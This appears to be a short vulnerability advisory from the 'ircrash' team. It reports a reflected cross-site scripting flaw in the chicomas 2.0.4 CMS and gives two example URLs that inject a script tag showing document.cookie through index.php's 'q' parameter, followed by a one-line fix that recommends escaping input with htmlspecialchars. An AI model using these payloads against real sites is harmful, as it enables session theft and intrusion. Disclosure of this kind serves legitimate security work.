chicomas.2.0.4
Author : Hadi Kiamarsi
----------------------------------------------------------------------------------
Discovered by : Hadi Kiamarsi
----------------------------------------------------------------------------------
Exploited By : Hadi Kiamarsi
----------------------------------------------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
----------------------------------------------------------------------------------
WebSite : http://ircrash.com
----------------------------------------------------------------------------------
Our Team : ircrash
----------------------------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------------------------
CMS: chicomas.2.0.4
Download CMS :
http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip
----------------------------------------------------------------------------------
Exploit :
Method = POST
query :
http://www.example.com/[chicomas]/index.php?q=>"><script>alert(document.cookie)</script>
query :
http://www.example.com/[chicomas]/index.php?q="><script>alert(document.cookie)</script>
-----------------------------------------------------------------------------------
Solution :
you must filter special character in input via htmlspecialchar() function
-----------------------------------------------------------------------------------